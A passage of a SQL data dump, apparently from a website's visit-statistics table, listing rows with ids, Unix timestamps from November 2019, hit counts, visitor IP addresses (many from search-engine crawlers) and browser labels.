1,1,0,0,'66.249.64.27','chrome'),(460874,1573550961,1,1,0,0,'18.219.234.8','chrome'),(460875,1573552661,1,1,0,0,'91.196.179.138','chrome'),(460876,1573552680,3,3,0,0,'66.249.64.26','chrome'),(460877,1573553147,1,1,0,0,'66.249.64.27','chrome'),(460878,1573553667,1,1,0,0,'66.249.64.26','chrome'),(460879,1573553784,1,1,0,0,'66.249.70.62','chrome'),(460880,1573553971,1,1,0,0,'46.219.33.158','chrome'),(460881,1573553975,1,1,0,0,'37.115.105.80','other'),(460882,1573554200,1,1,0,0,'66.249.64.28','chrome'),(460883,1573554692,1,1,0,0,'213.180.203.44','other'),(460884,1573555007,1,1,0,0,'46.211.130.168','chrome'),(460885,1573555025,1,1,0,0,'91.196.178.68','firefox'),(460886,1573555255,1,1,0,0,'8.29.198.27','other'),(460887,1573555778,1,1,0,0,'8.29.198.25','other'),(460888,1573556912,1,1,0,0,'66.249.64.26','chrome'),(460889,1573557050,1,1,0,0,'213.180.203.44','other'),(460890,1573557515,1,1,0,0,'91.196.179.138','chrome'),(460891,1573558680,1,1,0,0,'213.180.203.44','other'),(460892,1573558956,1,1,0,0,'31.13.127.20','other'),(460893,1573558957,1,1,0,0,'31.13.127.2','other'),(460895,1573558958,1,1,0,0,'31.13.127.17','other'),(460896,1573560272,1,1,0,0,'91.196.178.185','firefox'),(460897,1573560330,1,1,0,0,'91.196.178.185','chrome'),(460898,1573560346,2,2,0,0,'66.249.64.28','chrome'),(460899,1573560440,1,1,0,0,'178.154.200.71','other'),(460900,1573560460,1,1,0,0,'213.180.203.37','other'),(460901,1573560564,3,3,0,0,'66.249.64.27','chrome'),(460902,1573560570,1,1,0,0,'66.249.70.62','chrome'),(460903,1573560645,4,4,0,0,'66.249.64.26','chrome'),(460904,1573561940,1,1,0,0,'37.73.177.227','chrome'),(460905,1573562027,1,1,0,0,'91.196.178.185','chrome'),(460906,1573562153,2,2,0,0,'66.249.64.26','chrome'),(460907,1573562308,1,1,0,0,'66.249.64.28','chrome'),(460908,1573562662,1,1,0,0,'109.74.154.72','chrome'),(460909,1573562919,1,1,0,0,'94.178.231.42','chrome'),(460910,1573563370,1,1,0,0,'213.180.203.37','other'),(460911,1573563930,1,1,0,0,'66.249.64.28','chrome'),(460912,1573564382,1,1,0,0,'100.25.41.247','chrome'),(460913,1573564515,1,1,0,0,'66.249.64.27','chrome'),(460914,1573565706,1,1,0,0,'66.249.64.26','chrome'),(460915,1573566103,2,2,0,0,'8.29.198.27','other'),(460916,1573566322,1,1,0,0,'188.191.239.52','chrome'),(460917,1573566659,1,1,0,0,'77.111.244.139','chrome'),(460918,1573566755,1,1,0,0,'173.212.233.72','firefox'),(460919,1573567300,2,2,0,0,'66.249.64.26','chrome'),(460920,1573568183,1,1,0,0,'91.196.178.84','chrome'),(460921,1573568756,1,1,0,0,'213.180.203.44','other'),(460922,1573569018,1,1,0,0,'66.249.64.28','chrome'),(460923,1573569036,2,2,0,0,'66.249.64.26','chrome'),(460924,1573569828,1,1,0,0,'213.180.203.44','other'),(460925,1573570499,1,1,0,0,'66.249.70.62','chrome'),(460926,1573570530,1,1,0,0,'66.249.64.26','chrome'),(460927,1573571182,2,2,0,0,'213.180.203.44','other'),(460928,1573572238,1,1,0,0,'66.249.64.26','chrome'),(460929,1573572845,1,1,0,0,'95.132.17.165','other'),(460930,1573575547,1,1,0,0,'66.249.64.27','chrome'),(460931,1573575645,1,1,0,0,'157.55.39.136','other'),(460932,1573576110,1,1,0,0,'66.36.234.186','other'),(460933,1573576518,2,2,0,0,'66.249.64.27','chrome'),(460934,1573576527,1,1,0,0,'66.249.64.26','chrome'),(460935,1573576967,1,1,0,0,'8.29.198.26','other'),(460936,1573577479,1,1,0,0,'8.29.198.27','other'),(460937,1573578104,3,3,0,0,'66.249.64.27','chrome'),(460938,1573578291,1,1,0,0,'91.196.178.37','chrome'),(460939,1573578500,1,1,0,0,'37.9.113.10','other'),(460940,1573578810,1,1,0,0,'66.249.64.26','chrome'),(460941,1573579797,1,1,0,0,'213.180.203.37','other'),(460942,1573580176,1,1,0,0,'141.8.132.2','other'),(460943,1573581640,1,1,0,0,'66.249.70.33','chrome'),(460944,1573581849,1,1,0,0,'66.249.64.26','chrome'),(460945,1573583343,1,1,0,0,'66.249.64.27','chrome'),(460946,1573583453,1,1,0,0,'66.249.64.26','chrome'),(460947,1573584651,3,3,0,0,'66.249.64.26','chrome'),(460948,1573584970,1,1,0,0,'66.249.64.28','chrome'),(460949,1573584973,2,2,0,0,'157.55.39.136','other'),(460950,1573585054,2,2,0,0,'66.249.64.27','chrome'),(460951,1573586274,1,1,0,0,'66.249.64.28','chrome'),(460952,1573586437,1,1,0,0,'66.249.64.26','chrome'),(460953,1573587297,1,1,0,0,'66.249.64.27','chrome'),(460954,1573587434,1,1,0,0,'66.249.64.26','chrome'),(460955,1573587818,1,1,0,0,'8.29.198.25','other'),(460956,1573587921,2,2,0,0,'91.196.178.82','chrome'),(460957,1573588330,1,1,0,0,'8.29.198.26','other'),(460958,1573589171,1,1,0,0,'66.249.64.26','chrome'),(460959,1573589298,1,1,0,0,'213.180.203.44','other'),(460960,1573589828,1,1,0,0,'173.252.83.5','other'),(460961,1573589829,2,2,0,0,'173.252.83.12','other'),(460962,1573590023,1,1,0,0,'173.252.83.24','other'),(460963,1573590179,1,1,0,0,'173.252.83.11','other'),(460964,1573590180,1,1,0,0,'173.252.83.22','other'),(460965,1573590328,1,1,0,0,'66.249.64.26','chrome'),(460966,1573590783,1,1,0,0,'66.249.64.28','chrome'),(460967,1573591554,1,1,0,0,'213.180.203.44','other'),(460968,1573591743,1,1,0,0,'66.249.64.28','chrome'),(460969,1573592005,1,0,1,0,'66.249.64.26',''),(460970,1573592402,2,2,0,0,'66.249.64.26','chrome'),(460971,1573594668,1,1,0,0,'66.249.70.33','chrome'),(460972,1573594722,2,2,0,0,'66.249.64.28','chrome'),(460973,1573595118,2,2,0,0,'66.249.64.27','chrome'),(460974,1573595920,1,1,0,0,'207.46.13.20','other'),(460975,1573596483,1,1,0,0,'91.196.177.122','chrome'),(460976,1573596871,1,1,0,0,'66.249.70.33','chrome'),(460977,1573596986,1,1,0,0,'66.249.64.26','chrome'),(460978,1573597183,2,2,0,0,'207.46.13.20','other'),(460979,1573598311,1,1,0,0,'66.249.64.28','chrome'),(460980,1573598394,1,1,0,0,'66.249.64.27','chrome'),(460981,1573598664,1,1,0,0,'8.29.198.27','other'),(460982,1573599166,1,1,0,0,'8.29.198.26','other'),(460983,1573599220,2,2,0,0,'66.249.64.26','chrome'),(460984,1573599481,1,1,0,0,'66.249.64.28','chrome'),(460985,1573599553,1,1,0,0,'66.249.64.27','chrome'),(460986,1573600102,2,2,0,0,'66.249.70.62','chrome'),(460987,1573600170,2,2,0,0,'66.249.64.26','chrome'),(460988,1573600679,3,3,0,0,'66.249.64.28','chrome'),(460989,1573600763,131,131,0,0,'173.208.130.202','other'),(460990,1573601002,1,1,0,0,'95.216.2.253','other'),(460991,1573602348,3,3,0,0,'66.249.64.26','chrome'),(460992,1573603579,1,1,0,0,'66.249.64.26','chrome'),(460993,1573603624,1,1,0,0,'66.249.64.27','chrome'),(460994,1573603753,1,1,0,0,'13.66.139.0','other'),(460995,1573604345,1,1,0,0,'213.180.203.37','other'),(460996,1573604817,2,2,0,0,'207.46.13.199','other'),(460997,1573606267,1,1,0,0,'66.249.64.28','chrome'),(460998,1573606317,1,1,0,0,'66.249.70.36','chrome'),(460999,1573606408,1,1,0,0,'213.180.203.44','other'),(461000,1573607476,1,1,0,0,'66.249.64.28','chrome'),(461001,1573608207,2,2,0,0,'66.249.64.26','chrome'),(461002,1573608606,2,2,0,0,'66.249.64.27','chrome'),(461003,1573608665,1,1,0,0,'66.249.70.62','chrome'),(461004,1573609507,1,1,0,0,'8.29.198.26','other'),(461005,1573609961,1,1,0,0,'104.219.53.18','chrome'),(461006,1573610000,1,1,0,0,'8.29.198.27','other'),(461007,1573610468,2,2,0,0,'66.249.64.27','chrome'),(461008,1573610948,1,1,0,0,'13.66.139.0','other'),(461009,1573611077,1,1,0,0,'66.249.64.26','chrome'),(461010,1573611512,1,0,1,0,'207.46.13.199',''),(461011,1573612250,2,2,0,0,'66.249.64.26','chrome'),(461012,1573612337,1,1,0,0,'176.14.243.9','firefox'),(461013,1573612552,1,1,0,0,'213.180.203.44','other'),(461014,1573613779,1,0,1,0,'207.46.13.199',''),(461015,1573614334,1,1,0,0,'207.46.13.20','other'),(461016,1573614376,2,2,0,0,'66.249.64.27','chrome'),(461017,1573614612,11,11,0,0,'13.66.132.138','chrome'),(461018,1573614625,1,1,0,0,'66.249.64.26','chrome'),(461019,1573614754,1,1,0,0,'207.46.13.199','other'),(461020,1573617430,3,3,0,0,'91.209.11.236','other'),(461021,1573618231,1,1,0,0,'66.249.70.62','chrome'),(461022,1573618785,2,2,0,0,'66.249.64.27','chrome'),(461023,1573618809,2,2,0,0,'91.209.11.236','other'),(461024,1573619327,2,2,0,0,'66.249.64.26','chrome'),(461025,1573619782,1,1,0,0,'66.249.70.62','chrome'),(461026,1573620010,1,1,0,0,'66.249.64.28','chrome'),(461027,1573620072,2,2,0,0,'91.209.11.236','other'),(461028,1573620346,2,2,0,0,'8.29.198.27','other'),(461029,1573620598,1,1,0,0,'66.249.64.27','chrome'),(461030,1573622377,3,3,0,0,'66.249.64.26','chrome'),(461031,1573623069,1,1,0,0,'66.249.64.28','chrome'),(461032,1573623114,1,1,0,0,'66.249.64.27','chrome'),(461033,1573624249,1,1,0,0,'66.249.64.26','chrome'),(461034,1573624620,1,1,0,0,'89.208.86.230','chrome'),(461035,1573624704,1,1,0,0,'213.180.203.37','other'),(461036,1573624849,1,1,0,0,'213.180.203.44','other'),(461037,1573626011,1,1,0,0,'66.249.64.26','chrome'),(461038,1573626039,1,1,0,0,'66.249.64.27','chrome'),(461039,1573626064,1,1,0,0,'66.249.70.33','chrome'),(461040,1573626818,1,1,0,0,'141.8.142.50','other'),(461041,1573627010,1,1,0,0,'91.196.177.46','chrome'),(461042,1573627895,1,1,0,0,'213.180.203.37','other'),(461043,1573628199,1,1,0,0,'13.66.139.0','other'),(461044,1573628384,2,2,0,0,'66.249.64.27','chrome'),(461045,1573628727,1,1,0,0,'207.46.13.20','other'),(461046,1573628851,1,1,0,0,'91.196.178.176','chrome'),(461047,1573629049,2,2,0,0,'66.249.64.28','chrome'),(461048,1573629056,2,2,0,0,'66.249.64.26','chrome'),(461049,1573630088,2,2,0,0,'213.180.203.44','other'),(461050,1573631184,1,1,0,0,'8.29.198.25','other'),(461051,1573631365,1,1,0,0,'213.180.203.37','other'),(461052,1573631385,1,1,0,0,'213.180.203.44','other'),(461053,1573631531,1,1,0,0,'91.196.178.77','firefox'),(461054,1573631654,1,1,0,0,'8.29.198.27','other'),(461055,1573631718,1,1,0,0,'207.46.13.20','other'),(461056,1573631973,1,1,0,0,'91.196.178.84','chrome'),(461057,1573632114,1,1,0,0,'66.249.64.26','chrome'),(461058,1573632523,1,1,0,0,'213.180.203.44','other'),(461059,1573633238,1,1,0,0,'66.249.70.36','chrome'),(461060,1573633758,1,1,0,0,'91.196.178.77','firefox'),(461061,1573634067,1,1,0,0,'13.66.139.0','other'),(461062,1573634665,1,0,1,0,'66.249.64.28',''),(461063,1573634716,1,1,0,0,'141.8.142.2','other'),(461064,1573634800,1,1,0,0,'66.249.64.27','chrome'),(461065,1573634810,1,1,0,0,'195.230.119.38','chrome'),(461066,1573634831,2,2,0,0,'66.249.64.26','chrome'),(461067,1573634994,1,1,0,0,'188.165.255.126','msie'),(461068,1573635060,1,1,0,0,'66.249.64.28','chrome'),(461069,1573635089,2,2,0,0,'91.196.177.46','firefox'),(461070,1573635855,1,1,0,0,'213.180.203.44','other'),(461071,1573635872,1,1,0,0,'91.196.178.77','firefox'),(461072,1573635974,2,0,2,0,'66.249.70.62',''),(461073,1573636164,1,1,0,0,'5.248.131.114','chrome'),(461074,1573636199,1,0,1,0,'66.249.70.33',''),(461075,1573636317,2,0,2,0,'66.249.64.28',''),(461076,1573636726,1,1,0,0,'91.196.178.84','chrome'),(461077,1573636753,1,0,1,0,'66.249.70.36',''),(461078,1573636812,1,1,0,0,'91.196.177.46','firefox'),(461079,1573638106,1,1,0,0,'91.196.178.77','firefox'),(461080,1573638218,3,3,0,0,'91.196.178.84','chrome'),(461081,1573638485,2,2,0,0,'91.196.159.76','chrome'),(461082,1573639013,1,1,0,0,'66.249.70.33','chrome'),(461083,1573639177,2,2,0,0,'91.196.178.77','firefox'),(461084,1573639689,1,1,0,0,'66.249.64.28','chrome'),(461085,1573639717,1,1,0,0,'66.249.64.27','chrome'),(461086,1573639858,1,1,0,0,'91.196.159.76','chrome'),(461087,1573639868,1,1,0,0,'18.221.154.63','chrome'),(461088,1573639871,1,1,0,0,'91.196.178.84','chrome'),(461089,1573640438,2,2,0,0,'66.249.64.26','chrome'),(461090,1573640621,2,2,0,0,'66.249.64.28','chrome'),(461091,1573641008,1,1,0,0,'66.249.70.36','chrome'),(461092,1573641600,1,1,0,0,'91.196.178.77','firefox'),(461093,1573642002,2,2,0,0,'95.213.141.126','opera'),(461094,1573642037,1,1,0,0,'8.29.198.27','other'),(461095,1573642502,1,1,0,0,'8.29.198.26','other'),(461096,1573642548,2,2,0,0,'66.249.64.26','chrome'),(461097,1573642588,1,1,0,0,'91.196.178.77','firefox'),(461098,1573643046,1,1,0,0,'66.249.64.28','chrome'),(461099,1573643329,2,2,0,0,'66.249.64.27','chrome'),(461100,1573643737,1,1,0,0,'207.46.13.20','other'),(461101,1573643951,1,1,0,0,'213.180.203.37','other'),(461102,1573644456,1,1,0,0,'66.249.64.28','chrome'),(461103,1573644509,1,1,0,0,'66.249.64.27','chrome'),(461104,1573645583,1,1,0,0,'207.46.13.20','other'),(461105,1573646235,1,1,0,0,'66.249.70.33','chrome'),(461106,1573646284,1,1,0,0,'66.249.64.26','chrome'),(461107,1573647051,1,1,0,0,'91.196.178.84','chrome'),(461108,1573647072,1,1,0,0,'207.46.13.20','other'),(461109,1573647483,2,2,0,0,'66.249.64.26','chrome'),(461110,1573648057,1,1,0,0,'66.249.64.28','chrome'),(461111,1573648169,1,1,0,0,'157.55.39.178','other'),(461112,1573648266,1,1,0,0,'66.249.70.33','chrome'),(461113,1573648316,1,1,0,0,'207.46.13.119','other'),(461114,1573648498,1,1,0,0,'66.249.64.27','chrome'),(461115,1573648876,1,1,0,0,'91.196.178.77','firefox'),(461116,1573649175,1,1,0,0,'91.196.178.84','chrome'),(461117,1573649262,1,1,0,0,'5.45.207.49','other'),(461118,1573649627,1,1,0,0,'66.249.64.27','chrome'),(461119,1573650268,1,1,0,0,'91.196.178.77','firefox'),(461120,1573650790,1,1,0,0,'66.249.64.27','chrome'),(461121,1573651131,1,1,0,0,'66.249.70.62','chrome'),(461122,1573651177,3,3,0,0,'66.249.64.26','chrome'),(461123,1573651293,1,1,0,0,'195.162.90.62','chrome'),(461124,1573652007,1,1,0,0,'91.196.178.77','firefox'),(461125,1573652067,2,2,0,0,'66.249.64.27','chrome'),(461126,1573652377,1,1,0,0,'213.180.203.44','other'),(461127,1573652467,1,1,0,0,'91.196.178.92','chrome'),(461128,1573652575,1,1,0,0,'188.163.23.44','chrome'),(461129,1573652901,2,2,0,0,'8.29.198.26','other'),(461130,1573652996,1,1,0,0,'66.249.64.28','chrome'),(461131,1573653133,1,1,0,0,'157.55.39.178','other'),(461132,1573653157,1,1,0,0,'66.249.70.33','chrome'),(461133,1573653402,1,1,0,0,'207.46.13.119','other'),(461134,1573653428,1,1,0,0,'40.124.48.97','firefox'),(461135,1573653612,1,1,0,0,'66.249.70.62','chrome'),(461136,1573653639,1,1,0,0,'66.249.64.26','chrome'),(461137,1573653810,1,1,0,0,'213.180.203.44','other'),(461138,1573653818,1,1,0,0,'37.9.113.163','other'),(461139,1573654031,1,1,0,0,'66.249.64.28','chrome'),(461140,1573654917,1,1,0,0,'213.180.203.44','other'),(461141,1573655020,2,2,0,0,'66.249.64.27','chrome'),(461142,1573655238,2,2,0,0,'66.249.64.28','chrome'),(461143,1573655442,1,1,0,0,'207.46.13.20','other'),(461144,1573655611,2,2,0,0,'66.249.64.26','chrome'),(461145,1573655983,1,1,0,0,'141.8.142.2','other'),(461146,1573655986,1,1,0,0,'178.154.200.33','other'),(461147,1573656828,1,1,0,0,'107.178.194.160','chrome'),(461148,1573656837,2,2,0,0,'91.196.178.84','chrome'),(461149,1573656988,2,2,0,0,'213.180.203.44','other'),(461150,1573657024,1,1,0,0,'147.135.252.34','msie'),(461151,1573657619,1,1,0,0,'207.46.13.119','other'),(461152,1573657657,1,1,0,0,'66.249.64.28','chrome'),(461153,1573657674,1,1,0,0,'66.249.70.36','chrome'),(461154,1573657678,1,1,0,0,'66.249.64.27','chrome'),(461155,1573658446,1,1,0,0,'91.196.178.189','chrome'),(461156,1573659150,2,2,0,0,'213.180.203.44','other'),(461157,1573660075,1,1,0,0,'157.55.39.178','other'),(461158,1573661999,3,3,0,0,'66.249.64.27','chrome'),(461159,1573662356,2,2,0,0,'207.46.13.20','other'),(461160,1573662537,1,1,0,0,'66.249.64.26','chrome'),(461161,1573662551,1,1,0,0,'66.249.64.28','chrome'),(461162,1573663169,1,1,0,0,'5.62.18.65','chrome'),(461163,1573663443,1,1,0,0,'141.8.188.25','other'),(461164,1573663642,1,1,0,0,'46.211.247.143','chrome'),(461165,1573663771,2,2,0,0,'8.29.198.27','other'),(461166,1573664253,1,1,0,0,'66.249.64.26','chrome'),(461167,1573664669,2,2,0,0,'207.46.13.143','other'),(461168,1573665925,1,1,0,0,'95.108.181.104','other'),(461169,1573668116,1,1,0,0,'66.249.70.62','chrome'),(461170,1573668122,3,3,0,0,'66.249.64.27','chrome'),(461171,1573668268,1,1,0,0,'46.48.13.161','chrome'),(461172,1573668431,1,1,0,0,'91.196.178.52','chrome'),(461173,1573668465,2,2,0,0,'66.249.64.26','chrome'),(461174,1573669837,1,1,0,0,'207.46.13.20','other'),(461175,1573669855,1,1,0,0,'207.46.13.143','other'),(461176,1573670266,1,1,0,0,'109.74.154.72','chrome'),(461177,1573671114,1,1,0,0,'207.46.13.143','other'),(461178,1573671452,1,1,0,0,'66.249.64.26','chrome'),(461179,1573672008,1,1,0,0,'66.249.70.33','chrome'),(461180,1573673028,1,1,0,0,'157.55.39.178','other'),(461181,1573673592,13,13,0,0,'18.205.96.39','other'),(461182,1573674050,2,2,0,0,'66.249.64.26','chrome'),(461183,1573674138,2,2,0,0,'213.180.203.44','other'),(461184,1573674519,8,8,0,0,'18.205.96.39','other'),(461185,1573674618,1,1,0,0,'8.29.198.27','other'),(461186,1573675060,1,1,0,0,'8.29.198.26','other'),(461187,1573675255,1,1,0,0,'54.36.149.25','other'),(461188,1573675379,1,1,0,0,'66.249.64.26','chrome'),(461189,1573675479,5,5,0,0,'18.205.96.39','other'),(461190,1573676515,1,1,0,0,'213.180.203.37','other'),(461191,1573676610,2,2,0,0,'66.249.64.26','chrome'),(461192,1573676720,6,6,0,0,'18.205.96.39','other'),(461193,1573677035,1,1,0,0,'66.249.64.28','chrome'),(461194,1573677116,3,3,0,0,'142.112.13.43','other'),(461195,1573677754,8,8,0,0,'18.205.96.39','other'),(461196,1573678178,2,0,2,0,'66.249.70.33',''),(461197,1573678262,1,1,0,0,'207.46.13.19','other'),(461198,1573678754,4,4,0,0,'18.205.96.39','other'),(461199,1573678766,1,0,1,0,'66.249.64.28',''),(461200,1573679067,4,4,0,0,'66.249.64.27','chrome'),(461201,1573679213,1,1,0,0,'66.249.64.28','chrome'),(461202,1573679233,1,1,0,0,'66.249.70.33','chrome'),(461203,1573679303,1,1,0,0,'66.249.64.26','chrome'),(461204,1573679706,3,3,0,0,'18.205.96.39','other'),(461205,1573679869,1,0,1,0,'66.249.70.62',''),(461206,1573679905,1,1,0,0,'142.112.13.43','other'),(461207,1573679982,1,1,0,0,'207.46.13.143','other'),(461208,1573680230,1,1,0,0,'213.180.203.44','other'),(461209,1573681677,1,1,0,0,'207.46.13.143','other'),(461210,1573682291,1,1,0,0,'66.249.64.27','chrome'),(461211,1573682691,1,1,0,0,'142.112.13.43','other'),(461212,1573682783,4,4,0,0,'66.249.64.26','chrome'),(461213,1573682827,1,1,0,0,'91.196.178.185','chrome'),(461214,1573683199,6,6,0,0,'139.59.25.89','other'),(461215,1573683240,1,1,0,0,'66.249.64.27','chrome'),(461216,1573683449,1,1,0,0,'37.57.218.190','firefox'),(461217,1573683806,1,1,0,0,'207.46.13.19','other'),(461218,1573684392,1,1,0,0,'66.249.64.28','chrome'),(461219,1573684991,2,2,0,0,'66.249.64.26','chrome'),(461220,1573685455,2,2,0,0,'8.29.198.26','other'),(461221,1573685484,2,2,0,0,'213.180.203.44','other'),(461222,1573685548,1,1,0,0,'66.249.64.27','chrome'),(461223,1573686752,1,1,0,0,'13.66.139.0','other'),(461224,1573688900,1,1,0,0,'207.46.13.20','other'),(461225,1573689513,1,1,0,0,'207.46.13.19','other'),(461226,1573689933,1,1,0,0,'89.163.239.216','other'),(461227,1573690759,1,1,0,0,'66.249.64.26','chrome'),(461228,1573691835,1,1,0,0,'213.180.203.44','other'),(461229,1573695280,1,1,0,0,'207.46.13.143','other'),(461230,1573696316,1,1,0,0,'8.29.198.25','other'),(461231,1573696361,1,1,0,0,'207.46.13.143','other'),(461232,1573696752,1,1,0,0,'8.29.198.26','other'),(461233,1573697456,1,1,0,0,'66.249.70.62','chrome'),(461234,1573698659,2,2,0,0,'157.55.39.190','other'),(461235,1573702017,1,1,0,0,'213.180.203.37','other'),(461236,1573703029,1,1,0,0,'178.154.200.33','other'),(461237,1573703318,1,1,0,0,'66.249.64.27','chrome'),(461238,1573705097,1,1,0,0,'157.55.39.213','other'),(461239,1573705185,1,1,0,0,'66.249.64.26','chrome'),(461240,1573705411,1,1,0,0,'157.55.39.190','other'),(461241,1573705816,1,1,0,0,'66.249.64.28','chrome'),(461242,1573706077,1,1,0,0,'134.236.158.115','chrome'),(461243,1573706482,1,1,0,0,'54.36.149.30','other'),(461244,1573706885,1,1,0,0,'66.249.64.26','chrome'),(461245,1573707162,1,1,0,0,'8.29.198.25','other'),(461246,1573707593,1,1,0,0,'8.29.198.26','other'),(461247,1573708146,1,1,0,0,'157.55.39.190','other'),(461248,1573709109,1,1,0,0,'213.180.203.44','other'),(461249,1573709131,1,1,0,0,'213.180.203.37','other'),(461250,1573709287,1,1,0,0,'141.8.142.2','other'),(461251,1573709700,1,1,0,0,'157.55.39.190','other'),(461252,1573710081,1,1,0,0,'66.249.64.28','chrome'),(461253,1573710531,1,1,0,0,'66.249.64.27','chrome'),(461254,1573710569,1,1,0,0,'157.55.39.213','other'),(461255,1573710625,1,1,0,0,'37.9.113.163','other'),(461256,1573713004,1,1,0,0,'66.249.64.28','chrome'),(461257,1573713010,1,1,0,0,'66.249.70.62','chrome'),(461258,1573713339,1,1,0,0,'37.9.113.33','other'),(461259,1573714110,1,1,0,0,'66.249.64.28','chrome'),(461260,1573714178,1,1,0,0,'66.249.70.36','chrome'),(461261,1573714180,1,1,0,0,'66.249.64.26','chrome'),(461262,1573715366,1,1,0,0,'91.196.178.175','chrome'),(461263,1573715427,1,1,0,0,'66.249.64.27','chrome'),(461264,1573716446,1,1,0,0,'66.249.64.27','chrome'),(461265,1573716498,1,1,0,0,'141.8.188.25','other'),(461266,1573716594,1,1,0,0,'91.196.178.84','chrome'),(461267,1573716914,1,1,0,0,'193.29.15.151','other'),(461268,1573717176,2,2,0,0,'66.249.64.28','chrome'),(461269,1573717822,1,1,0,0,'66.249.64.26','chrome'),(461270,1573717932,1,1,0,0,'37.9.113.177','other'),(461271,1573717971,1,1,0,0,'141.8.132.31','other'),(461272,1573717995,2,2,0,0,'8.29.198.27','other'),(461273,1573718022,1,1,0,0,'141.8.142.164','other'),(461274,1573718345,1,1,0,0,'157.55.39.213','other'),(461275,1573718980,1,1,0,0,'93.183.254.142','firefox'),(461276,1573719078,2,2,0,0,'157.55.39.100','other'),(461277,1573720629,1,0,1,0,'66.249.64.26',''),(461278,1573721197,1,1,0,0,'157.55.39.213','other'),(461279,1573721359,1,0,1,0,'66.249.70.62',''),(461280,1573721468,1,0,1,0,'66.249.70.33',''),(461281,1573721575,1,1,0,0,'91.196.179.138','chrome'),(461282,1573723030,1,1,0,0,'91.196.178.84','chrome'),(461283,1573723522,1,1,0,0,'213.180.203.44','other'),(461284,1573723584,1,1,0,0,'195.162.90.62','chrome'),(461285,1573724097,1,1,0,0,'66.249.64.27','chrome'),(461286,1573724259,1,1,0,0,'157.55.39.213','other'),(461287,1573724265,1,1,0,0,'157.55.39.100','other'),(461288,1573724979,1,1,0,0,'213.180.203.37','other'),(461289,1573726699,1,1,0,0,'66.249.64.28','chrome'),(461290,1573727186,1,1,0,0,'3.14.143.209','chrome'),(461291,1573727282,1,1,0,0,'91.196.177.134','chrome'),(461292,1573728666,1,1,0,0,'157.55.39.131','other'),(461293,1573728701,1,1,0,0,'66.249.64.26','chrome'),(461294,1573728768,1,0,1,0,'66.249.64.27',''),(461295,1573728836,1,1,0,0,'8.29.198.26','other'),(461296,1573729260,1,1,0,0,'213.180.203.37','other'),(461297,1573729294,1,1,0,0,'8.29.198.27','other'),(461298,1573730561,1,1,0,0,'109.74.154.72','chrome'),(461299,1573732303,1,1,0,0,'157.55.39.131','other'),(461300,1573732307,1,1,0,0,'213.180.203.44','other'),(461301,1573732363,1,1,0,0,'178.133.97.126','other'),(461302,1573732526,1,1,0,0,'46.33.235.128','firefox'),(461303,1573733107,1,1,0,0,'66.249.70.33','chrome'),(461304,1573733394,3,3,0,0,'157.55.39.131','other'),(461305,1573733990,1,1,0,0,'91.196.178.135','firefox'),(461306,1573734464,1,1,0,0,'66.249.64.27','chrome'),(461307,1573735104,1,1,0,0,'213.180.203.44','other'),(461308,1573735592,1,1,0,0,'128.124.195.134','chrome'),(461309,1573736443,1,1,0,0,'213.180.203.44','other'),(461310,1573737167,1,1,0,0,'95.69.138.137','firefox'),(461311,1573737584,1,1,0,0,'91.196.178.84','chrome'),(461312,1573737813,1,1,0,0,'91.225.165.239','other'),(461313,1573737837,1,1,0,0,'185.109.54.88','chrome'),(461314,1573738774,1,1,0,0,'93.78.168.167','chrome'),(461315,1573739044,1,1,0,0,'91.196.178.84','chrome'),(461316,1573739069,1,1,0,0,'66.249.64.27','chrome'),(461317,1573739674,1,1,0,0,'8.29.198.27','other'),(461318,1573739684,1,1,0,0,'212.90.162.125','firefox'),(461319,1573739688,1,1,0,0,'82.145.212.9','other'),(461320,1573740153,1,1,0,0,'8.29.198.25','other'),(461321,1573740297,1,1,0,0,'178.92.9.202','chrome'),(461322,1573740460,1,1,0,0,'66.249.64.27','chrome'),(461323,1573740862,1,1,0,0,'91.196.178.84','chrome'),(461324,1573741352,1,1,0,0,'87.250.224.90','other'),(461325,1573743710,1,1,0,0,'157.55.39.9','other'),(461326,1573743887,2,2,0,0,'213.180.203.44','other'),(461327,1573744859,1,1,0,0,'91.196.178.176','chrome'),(461328,1573744959,1,1,0,0,'212.92.122.196','firefox'),(461329,1573745289,1,1,0,0,'46.211.129.45','chrome'),(461330,1573745385,1,1,0,0,'37.73.40.115','chrome'),(461331,1573745552,1,1,0,0,'81.133.241.97','other'),(461332,1573745995,1,1,0,0,'207.46.13.114','other'),(461333,1573746018,1,1,0,0,'91.196.178.131','chrome'),(461334,1573746393,1,1,0,0,'66.249.70.62','chrome'),(461335,1573746479,1,1,0,0,'172.94.64.7','chrome'),(461336,1573748267,1,1,0,0,'157.55.39.9','other'),(461337,1573748769,1,1,0,0,'66.249.64.28','chrome'),(461338,1573748908,1,1,0,0,'66.249.64.27','chrome'),(461339,1573749138,1,1,0,0,'88.99.2.203','other'),(461340,1573749162,3,3,0,0,'136.243.70.68','other'),(461341,1573749994,1,1,0,0,'66.249.64.27','chrome'),(461342,1573750150,1,1,0,0,'91.201.243.47','chrome'),(461343,1573750261,1,1,0,0,'34.77.218.42','chrome'),(461344,1573750508,1,1,0,0,'88.99.2.203','other'),(461345,1573750550,2,2,0,0,'8.29.198.27','other'),(461346,1573751058,1,1,0,0,'207.46.13.114','other'),(461347,1573751506,1,1,0,0,'88.99.2.203','other'),(461348,1573752133,1,1,0,0,'213.180.203.44','other'),(461349,1573752427,1,1,0,0,'88.99.2.203','other'),(461350,1573753026,1,1,0,0,'95.216.15.49','other'),(461351,1573753398,1,1,0,0,'88.99.2.203','other'),(461352,1573753627,1,1,0,0,'131.159.24.47','other'),(461353,1573753694,1,1,0,0,'207.46.13.114','other'),(461354,1573754423,1,1,0,0,'88.99.2.203','other'),(461355,1573754798,1,1,0,0,'213.180.203.37','other'),(461356,1573754989,1,1,0,0,'157.55.39.9','other'),(461357,1573755715,1,1,0,0,'178.92.9.202','chrome'),(461358,1573755750,1,1,0,0,'207.46.13.114','other'),(461359,1573756066,1,1,0,0,'66.249.64.28','chrome'),(461360,1573756132,1,1,0,0,'66.249.70.33','chrome'),(461361,1573756242,1,1,0,0,'207.46.13.177','other'),(461362,1573756338,1,1,0,0,'88.99.2.203','other'),(461363,1573756693,1,1,0,0,'66.249.64.26','chrome'),(461364,1573757724,1,1,0,0,'207.46.13.114','other'),(461365,1573759393,1,1,0,0,'91.196.178.60','chrome'),(461366,1573761416,1,1,0,0,'8.29.198.25','other'),(461367,1573761903,1,1,0,0,'8.29.198.27','other'),(461368,1573763498,1,1,0,0,'157.55.39.117','other'),(461369,1573763675,1,1,0,0,'137.226.113.34','firefox'),(461370,1573763752,2,2,0,0,'213.180.203.44','other'),(461371,1573763792,1,1,0,0,'137.226.113.27','other'),(461372,1573763941,1,1,0,0,'207.46.13.177','other'),(461373,